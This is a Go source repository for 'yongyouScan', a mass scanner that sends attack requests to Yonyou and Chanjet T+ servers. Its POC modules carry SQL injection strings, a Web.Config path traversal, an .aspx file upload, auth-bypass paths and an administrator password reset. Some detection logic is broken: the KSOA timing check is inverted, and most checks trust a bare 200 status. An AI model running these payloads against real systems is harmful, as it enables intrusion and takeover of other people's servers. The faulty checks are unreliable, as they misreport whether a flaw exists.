├── pkg ├── test │ └── test.go ├── utils │ └── utils.go ├── POC │ ├── fs-rzBypass │ │ └── fs-rzBypass.go │ ├── ConfigurationNc │ │ └── ConfigurationNc.go │ ├── Uapjs-JNDI │ │ └── Uapjs-JNDI.go │ ├── NCCloud-FS-sqljni │ │ └── yonyou-NCCloud-FS-sqljni.go │ ├── ERP-NC-MLBL │ │ └── yonyou-ERP-NC-MLBL.go │ ├── GRP-U8-Proxy-sqljin-xxe │ │ └── GRP-U8-Proxy-sqljin-xxe.go │ ├── U8-OA-test-sqjni │ │ └── U8-OA-test-sqjni.go │ ├── T-DownloadProxy-catfile │ │ └── T-DownloadProxy-catfile.go │ ├── uapws-wsdl-XXE │ │ └── uapws-wsdl-XXE.go │ ├── KSOA-ImageUpload │ │ └── KSOA-ImageUpload.go │ ├── NC-BshServlet │ │ ├── yonyou-NC-BshServlet.go │ │ └── payload.txt │ ├── T-CRM-sqljni │ │ └── T-CRM-sqljni.go │ ├── fs-dlbypass │ │ └── fs-dlbypass.go │ ├── KSOA-sqljni │ │ └── KSOA-sqljni.go │ ├── T-RecoverPassword │ │ └── T-RecoverPassword.go │ ├── uapws-acessBypass │ │ └── uapws-acessBypass.go │ ├── T-Uploadfile │ │ └── T-Uploadfile.go │ ├── accept-upload │ │ └── accept-upload.go │ ├── GRP-U8-U8AppProxy │ │ └── GRP-U8-U8AppProxy.go │ ├── GRP-U8-UploadFileData │ │ └── GRP-U8-UploadFileData.go │ ├── NC6.5-UploadFile │ │ └── yonyou-NC6.5-UploadFile.go │ ├── UploadServlet-Deser │ │ └── UploadServlet-Deser.go │ ├── MessageServlet-Deser │ │ └── MessageServlet-Deser.go │ ├── files-Deser │ │ └── files-Deser.go │ ├── NC-Cloud-MxServlet │ │ └── NC-Cloud-MxServlet.go │ ├── U8-RegisterServlet │ │ └── U8-RegisterServlet.go │ ├── u8-LoginServlet │ │ └── u8-LoginServlet.go │ ├── NC-XbrlPersistenceServlet │ │ └── yonyou-NC-XbrlPersistenceServlet.go │ ├── u8-MonitorServlet │ │ └── u8-MonitorServlet.go │ ├── U8-OA-getSessionList │ │ └── U8-OA-getSessionList.go │ ├── U8-ActionHandlerServlet │ │ └── U8-ActionHandlerServlet.go │ ├── U8-CacheInvokeServlet │ │ └── U8-CacheInvokeServlet.go │ ├── U8-ClientRequestDispatch │ │ └── U8-ClientRequestDispatch.go │ ├── u8-ServletCommander │ │ └── u8-ServletCommander.go │ ├── U8-FileTransportServlet │ │ └── U8-FileTransportServlet.go │ ├── FileReceiveServlet-Deser │ │ 
└── FileReceiveServlet-Deser.go │ ├── U8-TaskTreeQuery │ │ └── U8-TaskTreeQuery.go │ ├── u8-LoggingConfigServlet │ │ └── u8-LoggingConfigServlet.go │ ├── u8-TableInputOperServlet │ │ └── u8-TableInputOperServlet.go │ ├── NC-JiuQiClientReqDispatch │ │ └── NC-JiuQiClientReqDispatch.go │ └── monitorservlet-Desera │ │ └── monitorservlet-Desera.go ├── dnslog │ └── dnslog.go ├── qi │ └── qi.go └── config │ └── config.go ├── .idea ├── .gitignore ├── vcs.xml ├── modules.xml └── yonyouScan.iml ├── main.go ├── .github ├── workflows │ └── release1.yml └── conf │ └── .goreleaser.yml ├── go.mod ├── README.md └── go.sum /pkg/test/test.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | func main() { 4 | 5 | } 6 | -------------------------------------------------------------------------------- /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # 默认忽略的文件 2 | /shelf/ 3 | /workspace.xml 4 | # 基于编辑器的 HTTP 客户端请求 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/yonyouScan.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /pkg/utils/utils.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import "strings" 4 | 5 
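// InsertBackslashX returns s with "\x" written before the first character and
// after every following pair of characters, e.g. "abcd" -> `\xab\xcd` and
// "abc" -> `\xab\xc`.
//
// Characters are counted as runes, not bytes, so a multi-byte character counts
// once and the separator never lands inside a pair. An empty input yields an
// empty string.
func InsertBackslashX(s string) string {
	if s == "" {
		return ""
	}
	var out strings.Builder
	out.Grow(2 * len(s)) // one "\x" per pair plus the characters themselves
	for n, r := range []rune(s) {
		// n is the rune position: every pair boundary (0, 2, 4, ...) gets a "\x".
		if n%2 == 0 {
			out.WriteString("\\x")
		}
		out.WriteRune(r)
	}
	return out.String()
}
--------------------------------------------------------------------------------
/pkg/POC/fs-rzBypass/fs-rzBypass.go:
--------------------------------------------------------------------------------
package fs_rzBypass

import (
	"github.com/gookit/color"
	"github.com/imroc/req/v3"
	"time"
)

var (
	// client forces HTTP/1 and keeps a dump of every request/response in memory
	// (EnableDumpEachRequest); the dump is never read here, so it only costs memory.
	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
)

// Run sends a POST to url + "/fs/;/console.html" and prints the "存在"
// (present) line when the status line is exactly "200 OK"; a transport error
// or any other status prints the "不存在" (absent) line.
//
// NOTE(review): the decision rests on the status line alone — the body is
// never inspected — so a catch-all page that answers 200 for unknown paths
// yields a false positive, and a server sending a different reason phrase
// (resp.StatusCode is the robust field) is reported as absent.
func Run(url string) {
	url = url + "/fs/;/console.html"
	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
		"User-Agent": UA,
	}).Post(url)
	if err != nil {
		color.Red.Println("[-] 用友 文件服务器 认证绕过漏洞不存在")
		return
	}
	if resp.Status == "200 OK" {
		color.Green.Println("[+] 用友 文件服务器 认证绕过漏洞存在 -> " + url)
		return
	}
	color.Red.Println("[-] 用友 文件服务器 认证绕过漏洞不存在")
}
--------------------------------------------------------------------------------
/pkg/POC/ConfigurationNc/ConfigurationNc.go:
--------------------------------------------------------------------------------
package ConfigurationNc

import (
	"github.com/gookit/color"
	"github.com/imroc/req/v3"
	"time"
)

var (
	// client forces HTTP/1 with a 5s timeout; the per-request dump is unused.
	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
)

// Run fetches url + "/uapws/service" with a GET and prints the "存在" line
// only when the status line is exactly "200 OK" (same status-only caveat as
// the other probes: no body check, so catch-all 200 pages are false positives).
func Run(url string) {
	url = url +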
"/uapws/service" 16 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 17 | "User-Agent": UA, 18 | }).Get(url) 19 | if err != nil { 20 | color.Red.Println("[-] 用友 NC 配置文件泄露漏洞不存在") 21 | return 22 | } 23 | if resp.Status == "200 OK" { 24 | color.Green.Println("[+] 用友 NC 配置文件泄露漏洞存在 -> " + url) 25 | return 26 | } 27 | color.Red.Println("[-] 用友 NC 配置文件泄露漏洞不存在") 28 | } 29 | -------------------------------------------------------------------------------- /pkg/POC/Uapjs-JNDI/Uapjs-JNDI.go: -------------------------------------------------------------------------------- 1 | package Uapjs_JNDI 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | var ( 10 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 12 | ) 13 | 14 | func Run(url string) { 15 | url = url + "/uapjs/jsinvoke/?action=invoke" 16 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 17 | "User-Agent": UA, 18 | }).Post(url) 19 | if err != nil { 20 | color.Red.Println("[-] 用友 Uapjs JNDI注入漏洞不存在") 21 | return 22 | } 23 | if resp.Status == "200 OK" { 24 | color.Green.Println("[+] 用友 Uapjs JNDI注入漏洞存在 -> " + url) 25 | return 26 | } 27 | color.Red.Println("[-] 用友 Uapjs JNDI注入漏洞不存在") 28 | } 29 | -------------------------------------------------------------------------------- /pkg/POC/NCCloud-FS-sqljni/yonyou-NCCloud-FS-sqljni.go: -------------------------------------------------------------------------------- 1 | package NCCloud_FS_sqljni 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | ) 7 | 8 | var ( 9 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest() 10 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 11 | ) 12 | 13 | func 
Run(url string) { 14 | url = url + "/fs" 15 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 16 | "User-Agent": UA, 17 | }).Get(url) 18 | if err != nil { 19 | color.Red.Println("[-] 用友 NCCloud FS 文件管理 SQL 注入不存在") 20 | return 21 | } 22 | if resp.Status == "200 OK" { 23 | color.Green.Println("[+] 用友 NCCloud FS 文件管理 SQL 注入存在,只访问了fs,记得sqlmap跑下username参数来确认 -> " + url) 24 | return 25 | } 26 | color.Red.Println("[-] 用友 NCCloud FS 文件管理 SQL 注入不存在") 27 | } 28 | -------------------------------------------------------------------------------- /pkg/POC/ERP-NC-MLBL/yonyou-ERP-NC-MLBL.go: -------------------------------------------------------------------------------- 1 | package ERP_NC_MLBL 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | var ( 10 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 12 | ) 13 | 14 | func Run(url string) { 15 | url = url + "/NCFindWeb?service=IPreAlertConfigService&filename=" 16 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 17 | "User-Agent": UA, 18 | }).Get(url) 19 | if err != nil { 20 | color.Red.Println("[-] 用友 ERP-NC 目录遍历漏洞不存在") 21 | return 22 | } 23 | if resp.Status == "200 OK" { 24 | color.Green.Println("[+] 用友 ERP-NC 目录遍历漏洞存在 -> " + url) 25 | return 26 | } 27 | color.Red.Println("[-] 用友 ERP-NC 目录遍历漏洞不存在") 28 | } 29 | -------------------------------------------------------------------------------- /pkg/POC/GRP-U8-Proxy-sqljin-xxe/GRP-U8-Proxy-sqljin-xxe.go: -------------------------------------------------------------------------------- 1 | package GRP_U8_Proxy_sqljin_xxe 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | var ( 10 | client = 
req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 12 | ) 13 | 14 | func Run(url string) { 15 | url = url + "/Proxy" 16 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 17 | "User-Agent": UA, 18 | }).Post(url) 19 | if err != nil { 20 | color.Red.Println("[-] 用友 GRP-U8 Proxy SQL注入漏洞不存在") 21 | return 22 | } 23 | if resp.Status == "200 OK" { 24 | color.Green.Println("[+] 用友 GRP-U8 Proxy SQL注入漏洞存在 -> " + url) 25 | return 26 | } 27 | color.Red.Println("[-] 用友 GRP-U8 Proxy SQL注入漏洞不存在") 28 | } 29 | -------------------------------------------------------------------------------- /pkg/POC/U8-OA-test-sqjni/U8-OA-test-sqjni.go: -------------------------------------------------------------------------------- 1 | package U8_OA_test_sqjni 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | var ( 10 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 12 | ) 13 | 14 | func Run(url string) { 15 | url = url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))" 16 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 17 | "User-Agent": UA, 18 | }).Get(url) 19 | if err != nil { 20 | color.Red.Println("[-] 用友 U8 OA test.jsp SQL注入漏洞不存在") 21 | return 22 | } 23 | if resp.Status == "200 OK" { 24 | color.Green.Println("[+] 用友 U8 OA test.jsp SQL注入漏洞存在 -> " + url) 25 | return 26 | } 27 | color.Red.Println("[-] 用友 U8 OA test.jsp SQL注入漏洞不存在") 28 | } 29 | -------------------------------------------------------------------------------- /pkg/POC/T-DownloadProxy-catfile/T-DownloadProxy-catfile.go: 
-------------------------------------------------------------------------------- 1 | package T_DownloadProxy_catfile 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | var ( 10 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 12 | ) 13 | 14 | func Run(url string) { 15 | url = url + "/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config" 16 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 17 | "User-Agent": UA, 18 | }).Get(url) 19 | if err != nil { 20 | color.Red.Println("[-] 畅捷通T+ DownloadProxy任意文件读取漏洞不存在") 21 | return 22 | } 23 | if resp.Status == "200 OK" { 24 | color.Green.Println("[+] 畅捷通T+ DownloadProxy任意文件读取漏洞存在 -> " + url) 25 | return 26 | } 27 | color.Red.Println("[-] 畅捷通T+ DownloadProxy任意文件读取漏洞不存在") 28 | } 29 | -------------------------------------------------------------------------------- /pkg/POC/uapws-wsdl-XXE/uapws-wsdl-XXE.go: -------------------------------------------------------------------------------- 1 | package uapws_wsdl_XXE 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | // /uapws/service/nc.uap.oba.update.IUpdateService?xsd={{{xmlUrl}}} 10 | 11 | var ( 12 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 13 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 14 | ) 15 | 16 | func Run(url string) { 17 | url = url + "/uapws/service/nc.uap.oba.update.IUpdateService?xsd=" 18 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 19 | "User-Agent": UA, 20 | }).Get(url) 21 | if err != nil { 22 | color.Red.Println("[-] 用友 NC IUpdateService XXE漏洞不存在") 23 | return 24 | } 25 | if resp.Status == 
"200 OK" { 26 | color.Green.Println("[+] 用友 NC IUpdateService XXE漏洞存在 -> " + url) 27 | return 28 | } 29 | color.Red.Println("[-] 用友 NC IUpdateService XXE漏洞不存在") 30 | } 31 | -------------------------------------------------------------------------------- /pkg/POC/KSOA-ImageUpload/KSOA-ImageUpload.go: -------------------------------------------------------------------------------- 1 | package KSOA_ImageUpload 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | var ( 10 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 12 | ) 13 | 14 | func Run(url string) { 15 | url = url + "/servlet/com.sksoft.bill.ImageUpload?filename=test&filepath=/" 16 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 17 | "User-Agent": UA, 18 | }).SetBody("1").Get(url) 19 | if err != nil { 20 | color.Red.Println("[-] 用友 时空KSOA com.sksoft.bill.ImageUpload 任意文件上传漏洞不存在") 21 | return 22 | } 23 | if resp.Status == "200 OK" { 24 | color.Green.Println("[+] 用友 时空KSOA com.sksoft.bill.ImageUpload 任意文件上传漏洞存在 -> " + url) 25 | return 26 | } 27 | color.Red.Println("[-] 用友 时空KSOA com.sksoft.bill.ImageUpload 任意文件上传漏洞不存在") 28 | } 29 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "flag" 5 | "fmt" 6 | "os" 7 | "yongyouScan/pkg/config" 8 | "yongyouScan/pkg/qi" 9 | ) 10 | 11 | var ( 12 | Url string 13 | file string 14 | ) 15 | 16 | func usage() { 17 | fmt.Println(`Usage of main.exe: 18 | -u url 19 | you target, example: 127.0.0.1 20 | -f targets.txt 21 | Read the target from the file and test the vulnerabilities in batches 22 | `) 23 | } 24 | 25 | func main() { 26 | flag.StringVar(&Url, "u", "", "your 
target") 27 | flag.StringVar(&file, "f", "", "Specify batch target") 28 | flag.Usage = usage 29 | flag.Parse() 30 | 31 | if Url == "" && file == "" { 32 | usage() 33 | os.Exit(0) 34 | } 35 | 36 | qi.Logo() 37 | 38 | qi4l := config.WorkExp{ 39 | Url: Url, 40 | } 41 | 42 | if file != "" { 43 | lines, err := qi.ReadLinesFromFile(file) 44 | if err != nil { 45 | fmt.Println(err) 46 | return 47 | } 48 | for _, line := range lines { 49 | qi4l.Url = line 50 | qi4l.YonYouScanRun() 51 | } 52 | } 53 | 54 | qi4l.YonYouScanRun() 55 | } 56 | -------------------------------------------------------------------------------- /.github/workflows/release1.yml: -------------------------------------------------------------------------------- 1 | name: goreleaser 2 | 3 | on: 4 | push: 5 | tags: 6 | - '*' 7 | 8 | permissions: 9 | contents: write 10 | 11 | jobs: 12 | goreleaser: 13 | runs-on: ubuntu-latest 14 | timeout-minutes: 60 15 | steps: 16 | - name: "Check out code" 17 | uses: actions/checkout@v3 18 | with: 19 | fetch-depth: 0 20 | 21 | - name: "Set up Go" 22 | uses: actions/setup-go@v4 23 | with: 24 | go-version: 1.21.x 25 | - 26 | name: Install UPX 27 | uses: crazy-max/ghaction-upx@v3 28 | with: 29 | install-only: true 30 | 31 | - name: UPX version 32 | run: upx --version 33 | 34 | - 35 | name: "Create release on GitHub" 36 | uses: goreleaser/goreleaser-action@v4 37 | with: 38 | distribution: goreleaser 39 | version: latest 40 | args: "release --clean --debug -f .github/conf/.goreleaser.yml" 41 | workdir: . 
42 | env: 43 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} -------------------------------------------------------------------------------- /pkg/POC/NC-BshServlet/yonyou-NC-BshServlet.go: -------------------------------------------------------------------------------- 1 | package NC_BshServlet 2 | 3 | import ( 4 | "bufio" 5 | _ "embed" 6 | "github.com/gookit/color" 7 | "github.com/imroc/req/v3" 8 | "strings" 9 | "time" 10 | ) 11 | 12 | //go:embed payload.txt 13 | var Payload string 14 | 15 | var ( 16 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(1 * time.Second) 17 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 18 | ) 19 | 20 | func Run(url string) { 21 | scanner := bufio.NewScanner(strings.NewReader(Payload)) 22 | for scanner.Scan() { 23 | line := scanner.Text() 24 | url = url + line 25 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 26 | "User-Agent": UA, 27 | }).Get(url) 28 | if err != nil { 29 | } else { 30 | if resp.Status == "200 OK" { 31 | color.Green.Println("[+] 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞存在 -> " + url) 32 | return 33 | } 34 | } 35 | } 36 | color.Red.Println("[-] 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞不存在") 37 | } 38 | -------------------------------------------------------------------------------- /pkg/POC/T-CRM-sqljni/T-CRM-sqljni.go: -------------------------------------------------------------------------------- 1 | package T_CRM_sqljni 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | var ( 10 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 12 | ) 13 | 14 | func Run(url string) { 15 | url = url + 
"/WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)" 16 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 17 | "User-Agent": UA, 18 | }).Post(url) 19 | if err != nil { 20 | color.Red.Println("[-] 用友 畅捷通T-CRM get_usedspace.php SQL注入漏洞不存在") 21 | return 22 | } 23 | if resp.Status == "200 OK" { 24 | color.Green.Println("[+] 用友 畅捷通T-CRM get_usedspace.php SQL注入漏洞存在 -> " + url) 25 | return 26 | } 27 | color.Red.Println("[-] 用友 畅捷通T-CRM get_usedspace.php SQL注入漏洞不存在") 28 | } 29 | -------------------------------------------------------------------------------- /pkg/POC/fs-dlbypass/fs-dlbypass.go: -------------------------------------------------------------------------------- 1 | package fs_dlbypass 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "strings" 7 | "time" 8 | ) 9 | 10 | var ( 11 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 12 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 13 | ) 14 | 15 | func Run(url string) { 16 | url = url + "/fs/;/console" 17 | resp, err := client.R(). 18 | SetHeaders(map[string]string{ // Set multiple headers at once 19 | "User-Agent": UA, 20 | }). 
21 | SetFormData(map[string]string{ 22 | "operType": "login", 23 | "username": "123", 24 | "password": "%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D", 25 | }).Post(url) 26 | if err != nil { 27 | color.Red.Println("[-] 用友 文件服务器 认证绕过漏洞不存在") 28 | return 29 | } 30 | if strings.Contains(resp.String(), "{\"login\":\"false\"}") { 31 | color.Green.Println("[+] 用友 文件服务器 认证绕过漏洞存在 -> " + url) 32 | return 33 | } 34 | color.Red.Println("[-] 用友 文件服务器 认证绕过漏洞不存在") 35 | } 36 | -------------------------------------------------------------------------------- /pkg/POC/KSOA-sqljni/KSOA-sqljni.go: -------------------------------------------------------------------------------- 1 | package KSOA_sqljni 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | var ( 10 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(7 * time.Second) 11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 12 | ) 13 | 14 | //https://blog.csdn.net/qq_41904294/article/details/134981039?spm=1001.2014.3001.5502 15 | 16 | func Run(url string) { 17 | url = url + "/linksframe/linkadd.jsp?id=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27" 18 | startTime := time.Now() 19 | _, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 20 | "User-Agent": UA, 21 | }).Get(url) 22 | if err != nil { 23 | color.Red.Println("[-] 用友时空 KSOA 多处SQL注入漏洞不存在") 24 | return 25 | } 26 | endTime := time.Now() 27 | duration := endTime.Sub(startTime) 28 | if duration <= 5*time.Second { 29 | color.Green.Println("[+] 用友时空 KSOA 多处SQL注入漏洞存在 -> " + url) 30 | return 31 | } 32 | color.Red.Println("[-] 用友时空 KSOA 多处SQL注入漏洞不存在") 33 | } 34 | -------------------------------------------------------------------------------- /pkg/POC/T-RecoverPassword/T-RecoverPassword.go: -------------------------------------------------------------------------------- 1 | package T_RecoverPassword 2 | 3 | import ( 4 
| "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | var ( 10 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 12 | ) 13 | 14 | func Run(url string) { 15 | url = url + "/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd" 16 | resp, err := client.R(). 17 | SetHeaders(map[string]string{ // Set multiple headers at once 18 | "User-Agent": UA, 19 | "Content-Type": "application/x-www-form-urlencoded", 20 | }).SetBody("{\"pwdNew\":\"46f94c8de14fb36680850768ff1b7f2a\"}").Post(url) 21 | if err != nil { 22 | color.Red.Println("[-] 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞不存在") 23 | return 24 | } 25 | if resp.Status == "200 OK" { 26 | color.Green.Println("[+] 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞存在 -> " + url) 27 | return 28 | } 29 | color.Red.Println("[-] 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞不存在") 30 | } 31 | -------------------------------------------------------------------------------- /pkg/POC/uapws-acessBypass/uapws-acessBypass.go: -------------------------------------------------------------------------------- 1 | package uapws_acessBypass 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | var ( 10 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 12 | ) 13 | 14 | func Run(url string) { 15 | url1 := url + "/uapws/index.jsp" 16 | resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 17 | "User-Agent": UA, 18 | }).Get(url1) 19 | if err != nil { 20 | color.Red.Println("[-] 用友 uapws 认证绕过漏洞不存在") 21 | return 22 | } 23 | if resp.Status == "200 OK" { 24 | color.Green.Println("[+] 用友 uapws 认证绕过漏洞存在 -> " 
+ url1) 25 | } 26 | url2 := url + "/uapws/login.ajax" 27 | resp1, err1 := client.R().SetHeaders(map[string]string{ // Set multiple headers at once 28 | "User-Agent": UA, 29 | }).Get(url2) 30 | if err1 != nil { 31 | color.Red.Println("[-] 用友 uapws 认证绕过漏洞不存在") 32 | return 33 | } 34 | if resp1.Status == "200 OK" { 35 | color.Green.Println("[+] 用友 uapws 认证绕过漏洞存在 -> " + url2) 36 | return 37 | } 38 | color.Red.Println("[-] 用友 uapws 认证绕过漏洞不存在") 39 | } 40 | -------------------------------------------------------------------------------- /pkg/POC/T-Uploadfile/T-Uploadfile.go: -------------------------------------------------------------------------------- 1 | package T_Uploadfile 2 | 3 | import ( 4 | "github.com/gookit/color" 5 | "github.com/imroc/req/v3" 6 | "time" 7 | ) 8 | 9 | var ( 10 | client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second) 11 | UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 12 | ) 13 | 14 | func Run(url string) { 15 | url = url + "/tplus/SM/SetupAccount/Upload.aspx?preload=1" 16 | data := "------WebKitFormBoundarywwk2ReqGTj7lNYlt\nContent-Disposition: form-data; name=\"File1\";filename=\"222.aspx\"\nContent-Type: image/jpeg\n\n1\n------WebKitFormBoundarywwk2ReqGTj7lNYlt--" 17 | resp, err := client.R().EnableForceMultipart(). 
18 | SetHeaders(map[string]string{ // Set multiple headers at once 19 | "User-Agent": UA, 20 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarywwk2ReqGTj7lNYlt", 21 | }).SetBody(data).Post(url) 22 | if err != nil { 23 | color.Red.Println("[-] 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞不存在") 24 | return 25 | } 26 | if resp.Status == "200 OK" { 27 | color.Green.Println("[+] 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞存在 -> " + url) 28 | return 29 | } 30 | color.Red.Println("[-] 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞不存在") 31 | } 32 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module yongyouScan 2 | 3 | go 1.21.4 4 | 5 | require ( 6 | github.com/gookit/color v1.5.4 7 | github.com/imroc/req/v3 v3.42.2 8 | ) 9 | 10 | require ( 11 | github.com/andybalholm/brotli v1.0.5 // indirect 12 | github.com/cloudflare/circl v1.3.3 // indirect 13 | github.com/gaukas/godicttls v0.0.4 // indirect 14 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572 // indirect 15 | github.com/google/pprof v0.0.0-20230901174712-0191c66da455 // indirect 16 | github.com/hashicorp/errwrap v1.1.0 // indirect 17 | 